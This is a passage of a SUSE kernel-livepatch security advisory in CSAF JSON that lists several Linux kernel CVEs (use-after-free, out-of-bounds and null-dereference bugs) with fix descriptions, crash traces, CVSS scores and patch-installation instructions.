"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmc: Fix use-after-free in tcp_write_timer_handler().\n\nWith Eric\u0027s ref tracker, syzbot finally found a repro for\nuse-after-free in tcp_write_timer_handler() by kernel TCP\nsockets. [0]\n\nIf SMC creates a kernel socket in __smc_create(), the kernel\nsocket is supposed to be freed in smc_clcsock_release() by\ncalling sock_release() when we close() the parent SMC socket.\n\nHowever, at the end of smc_clcsock_release(), the kernel\nsocket\u0027s sk_state might not be TCP_CLOSE. This means that\nwe have not called inet_csk_destroy_sock() in __tcp_close()\nand have not stopped the TCP timers.\n\nThe kernel socket\u0027s TCP timers can be fired later, so we\nneed to hold a refcnt for net as we do for MPTCP subflows\nin mptcp_subflow_create_socket().\n\n[0]:\nleaked reference.\n sk_alloc (./include/net/net_namespace.h:335 net/core/sock.c:2108)\n inet_create (net/ipv4/af_inet.c:319 net/ipv4/af_inet.c:244)\n __sock_create (net/socket.c:1546)\n smc_create (net/smc/af_smc.c:3269 net/smc/af_smc.c:3284)\n __sock_create (net/socket.c:1546)\n __sys_socket (net/socket.c:1634 net/socket.c:1618 net/socket.c:1661)\n __x64_sys_socket (net/socket.c:1672)\n do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)\n entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:120)\n==================================================================\nBUG: KASAN: slab-use-after-free in tcp_write_timer_handler (net/ipv4/tcp_timer.c:378 net/ipv4/tcp_timer.c:624 net/ipv4/tcp_timer.c:594)\nRead of size 1 at addr ffff888052b65e0d by task syzrepro/18091\n\nCPU: 0 PID: 18091 Comm: syzrepro Tainted: G W 6.3.0-rc4-01174-gb5d54eb5899a #7\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-1.amzn2022.0.1 04/01/2014\nCall Trace:\n \u003cIRQ\u003e\n dump_stack_lvl (lib/dump_stack.c:107)\n print_report (mm/kasan/report.c:320 mm/kasan/report.c:430)\n kasan_report (mm/kasan/report.c:538)\n tcp_write_timer_handler (net/ipv4/tcp_timer.c:378 net/ipv4/tcp_timer.c:624 net/ipv4/tcp_timer.c:594)\n tcp_write_timer (./include/linux/spinlock.h:390 net/ipv4/tcp_timer.c:643)\n call_timer_fn (./arch/x86/include/asm/jump_label.h:27 ./include/linux/jump_label.h:207 ./include/trace/events/timer.h:127 kernel/time/timer.c:1701)\n __run_timers.part.0 (kernel/time/timer.c:1752 kernel/time/timer.c:2022)\n run_timer_softirq (kernel/time/timer.c:2037)\n __do_softirq (./arch/x86/include/asm/jump_label.h:27 ./include/linux/jump_label.h:207 ./include/trace/events/irq.h:142 kernel/softirq.c:572)\n __irq_exit_rcu (kernel/softirq.c:445 kernel/softirq.c:650)\n irq_exit_rcu (kernel/softirq.c:664)\n sysvec_apic_timer_interrupt (arch/x86/kernel/apic/apic.c:1107 (discriminator 14))\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53781",
"url": "https://www.suse.com/security/cve/CVE-2023-53781"
},
{
"category": "external",
"summary": "SUSE Bug 1254751 for CVE-2023-53781",
"url": "https://bugzilla.suse.com/1254751"
},
{
"category": "external",
"summary": "SUSE Bug 1254755 for CVE-2023-53781",
"url": "https://bugzilla.suse.com/1254755"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T01:34:07Z",
"details": "important"
}
],
"title": "CVE-2023-53781"
},
{
"cve": "CVE-2025-21738",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-21738"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nata: libata-sff: Ensure that we cannot write outside the allocated buffer\n\nreveliofuzzing reported that a SCSI_IOCTL_SEND_COMMAND ioctl with out_len\nset to 0xd42, SCSI command set to ATA_16 PASS-THROUGH, ATA command set to\nATA_NOP, and protocol set to ATA_PROT_PIO, can cause ata_pio_sector() to\nwrite outside the allocated buffer, overwriting random memory.\n\nWhile a ATA device is supposed to abort a ATA_NOP command, there does seem\nto be a bug either in libata-sff or QEMU, where either this status is not\nset, or the status is cleared before read by ata_sff_hsm_move().\nAnyway, that is most likely a separate bug.\n\nLooking at __atapi_pio_bytes(), it already has a safety check to ensure\nthat __atapi_pio_bytes() cannot write outside the allocated buffer.\n\nAdd a similar check to ata_pio_sector(), such that also ata_pio_sector()\ncannot write outside the allocated buffer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-21738",
"url": "https://www.suse.com/security/cve/CVE-2025-21738"
},
{
"category": "external",
"summary": "SUSE Bug 1238917 for CVE-2025-21738",
"url": "https://bugzilla.suse.com/1238917"
},
{
"category": "external",
"summary": "SUSE Bug 1257118 for CVE-2025-21738",
"url": "https://bugzilla.suse.com/1257118"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T01:34:07Z",
"details": "important"
}
],
"title": "CVE-2025-21738"
},
{
"cve": "CVE-2025-38159",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38159"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtw88: fix the \u0027para\u0027 buffer size to avoid reading out of bounds\n\nSet the size to 6 instead of 2, since \u0027para\u0027 array is passed to\n\u0027rtw_fw_bt_wifi_control(rtwdev, para[0], \u0026para[1])\u0027, which reads\n5 bytes:\n\nvoid rtw_fw_bt_wifi_control(struct rtw_dev *rtwdev, u8 op_code, u8 *data)\n{\n ...\n SET_BT_WIFI_CONTROL_DATA1(h2c_pkt, *data);\n SET_BT_WIFI_CONTROL_DATA2(h2c_pkt, *(data + 1));\n ...\n SET_BT_WIFI_CONTROL_DATA5(h2c_pkt, *(data + 4));\n\nDetected using the static analysis tool - Svace.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38159",
"url": "https://www.suse.com/security/cve/CVE-2025-38159"
},
{
"category": "external",
"summary": "SUSE Bug 1245751 for CVE-2025-38159",
"url": "https://bugzilla.suse.com/1245751"
},
{
"category": "external",
"summary": "SUSE Bug 1257629 for CVE-2025-38159",
"url": "https://bugzilla.suse.com/1257629"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T01:34:07Z",
"details": "important"
}
],
"title": "CVE-2025-38159"
},
{
"cve": "CVE-2025-38488",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38488"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix use-after-free in crypt_message when using async crypto\n\nThe CVE-2024-50047 fix removed asynchronous crypto handling from\ncrypt_message(), assuming all crypto operations are synchronous.\nHowever, when hardware crypto accelerators are used, this can cause\nuse-after-free crashes:\n\n crypt_message()\n // Allocate the creq buffer containing the req\n creq = smb2_get_aead_req(..., \u0026req);\n\n // Async encryption returns -EINPROGRESS immediately\n rc = enc ? crypto_aead_encrypt(req) : crypto_aead_decrypt(req);\n\n // Free creq while async operation is still in progress\n kvfree_sensitive(creq, ...);\n\nHardware crypto modules often implement async AEAD operations for\nperformance. When crypto_aead_encrypt/decrypt() returns -EINPROGRESS,\nthe operation completes asynchronously. Without crypto_wait_req(),\nthe function immediately frees the request buffer, leading to crashes\nwhen the driver later accesses the freed memory.\n\nThis results in a use-after-free condition when the hardware crypto\ndriver later accesses the freed request structure, leading to kernel\ncrashes with NULL pointer dereferences.\n\nThe issue occurs because crypto_alloc_aead() with mask=0 doesn\u0027t\nguarantee synchronous operation. Even without CRYPTO_ALG_ASYNC in\nthe mask, async implementations can be selected.\n\nFix by restoring the async crypto handling:\n- DECLARE_CRYPTO_WAIT(wait) for completion tracking\n- aead_request_set_callback() for async completion notification\n- crypto_wait_req() to wait for operation completion\n\nThis ensures the request buffer isn\u0027t freed until the crypto operation\ncompletes, whether synchronous or asynchronous, while preserving the\nCVE-2024-50047 fix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38488",
"url": "https://www.suse.com/security/cve/CVE-2025-38488"
},
{
"category": "external",
"summary": "SUSE Bug 1247239 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247239"
},
{
"category": "external",
"summary": "SUSE Bug 1247240 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247240"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T01:34:07Z",
"details": "important"
}
],
"title": "CVE-2025-38488"
},
{
"cve": "CVE-2025-40258",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40258"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix race condition in mptcp_schedule_work()\n\nsyzbot reported use-after-free in mptcp_schedule_work() [1]\n\nIssue here is that mptcp_schedule_work() schedules a work,\nthen gets a refcount on sk-\u003esk_refcnt if the work was scheduled.\nThis refcount will be released by mptcp_worker().\n\n[A] if (schedule_work(...)) {\n[B] sock_hold(sk);\n return true;\n }\n\nProblem is that mptcp_worker() can run immediately and complete before [B]\n\nWe need instead :\n\n sock_hold(sk);\n if (schedule_work(...))\n return true;\n sock_put(sk);\n\n[1]\nrefcount_t: addition on 0; use-after-free.\n WARNING: CPU: 1 PID: 29 at lib/refcount.c:25 refcount_warn_saturate+0xfa/0x1d0 lib/refcount.c:25\nCall Trace:\n \u003cTASK\u003e\n __refcount_add include/linux/refcount.h:-1 [inline]\n __refcount_inc include/linux/refcount.h:366 [inline]\n refcount_inc include/linux/refcount.h:383 [inline]\n sock_hold include/net/sock.h:816 [inline]\n mptcp_schedule_work+0x164/0x1a0 net/mptcp/protocol.c:943\n mptcp_tout_timer+0x21/0xa0 net/mptcp/protocol.c:2316\n call_timer_fn+0x17e/0x5f0 kernel/time/timer.c:1747\n expire_timers kernel/time/timer.c:1798 [inline]\n __run_timers kernel/time/timer.c:2372 [inline]\n __run_timer_base+0x648/0x970 kernel/time/timer.c:2384\n run_timer_base kernel/time/timer.c:2393 [inline]\n run_timer_softirq+0xb7/0x180 kernel/time/timer.c:2403\n handle_softirqs+0x22f/0x710 kernel/softirq.c:622\n __do_softirq kernel/softirq.c:656 [inline]\n run_ktimerd+0xcf/0x190 kernel/softirq.c:1138\n smpboot_thread_fn+0x542/0xa60 kernel/smpboot.c:160\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40258",
"url": "https://www.suse.com/security/cve/CVE-2025-40258"
},
{
"category": "external",
"summary": "SUSE Bug 1254843 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1254843"
},
{
"category": "external",
"summary": "SUSE Bug 1255053 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1255053"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T01:34:07Z",
"details": "important"
}
],
"title": "CVE-2025-40258"
},
{
"cve": "CVE-2025-68284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds writes in handle_auth_session_key()\n\nThe len field originates from untrusted network packets. Boundary\nchecks have been added to prevent potential out-of-bounds writes when\ndecrypting the connection secret or processing service tickets.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68284",
"url": "https://www.suse.com/security/cve/CVE-2025-68284"
},
{
"category": "external",
"summary": "SUSE Bug 1255377 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255377"
},
{
"category": "external",
"summary": "SUSE Bug 1255378 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255378"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T01:34:07Z",
"details": "important"
}
],
"title": "CVE-2025-68284"
},
{
"cve": "CVE-2025-68285",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68285"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix potential use-after-free in have_mon_and_osd_map()\n\nThe wait loop in __ceph_open_session() can race with the client\nreceiving a new monmap or osdmap shortly after the initial map is\nreceived. Both ceph_monc_handle_map() and handle_one_map() install\na new map immediately after freeing the old one\n\n kfree(monc-\u003emonmap);\n monc-\u003emonmap = monmap;\n\n ceph_osdmap_destroy(osdc-\u003eosdmap);\n osdc-\u003eosdmap = newmap;\n\nunder client-\u003emonc.mutex and client-\u003eosdc.lock respectively, but\nbecause neither is taken in have_mon_and_osd_map() it\u0027s possible for\nclient-\u003emonc.monmap-\u003eepoch and client-\u003eosdc.osdmap-\u003eepoch arms in\n\n client-\u003emonc.monmap \u0026\u0026 client-\u003emonc.monmap-\u003eepoch \u0026\u0026\n client-\u003eosdc.osdmap \u0026\u0026 client-\u003eosdc.osdmap-\u003eepoch;\n\ncondition to dereference an already freed map. This happens to be\nreproducible with generic/395 and generic/397 with KASAN enabled:\n\n BUG: KASAN: slab-use-after-free in have_mon_and_osd_map+0x56/0x70\n Read of size 4 at addr ffff88811012d810 by task mount.ceph/13305\n CPU: 2 UID: 0 PID: 13305 Comm: mount.ceph Not tainted 6.14.0-rc2-build2+ #1266\n ...\n Call Trace:\n \u003cTASK\u003e\n have_mon_and_osd_map+0x56/0x70\n ceph_open_session+0x182/0x290\n ceph_get_tree+0x333/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\n Allocated by task 13305:\n ceph_osdmap_alloc+0x16/0x130\n ceph_osdc_init+0x27a/0x4c0\n ceph_create_client+0x153/0x190\n create_fs_client+0x50/0x2a0\n ceph_get_tree+0xff/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n Freed by task 9475:\n kfree+0x212/0x290\n handle_one_map+0x23c/0x3b0\n ceph_osdc_handle_map+0x3c9/0x590\n mon_dispatch+0x655/0x6f0\n ceph_con_process_message+0xc3/0xe0\n ceph_con_v1_try_read+0x614/0x760\n ceph_con_workfn+0x2de/0x650\n process_one_work+0x486/0x7c0\n process_scheduled_works+0x73/0x90\n worker_thread+0x1c8/0x2a0\n kthread+0x2ec/0x300\n ret_from_fork+0x24/0x40\n ret_from_fork_asm+0x1a/0x30\n\nRewrite the wait loop to check the above condition directly with\nclient-\u003emonc.mutex and client-\u003eosdc.lock taken as appropriate. While\nat it, improve the timeout handling (previously mount_timeout could be\nexceeded in case wait_event_interruptible_timeout() slept more than\nonce) and access client-\u003eauth_err under client-\u003emonc.mutex to match\nhow it\u0027s set in finish_auth().\n\nmonmap_show() and osdmap_show() now take the respective lock before\naccessing the map as well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68285",
"url": "https://www.suse.com/security/cve/CVE-2025-68285"
},
{
"category": "external",
"summary": "SUSE Bug 1255401 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "external",
"summary": "SUSE Bug 1255402 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255402"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T01:34:07Z",
"details": "important"
}
],
"title": "CVE-2025-68285"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
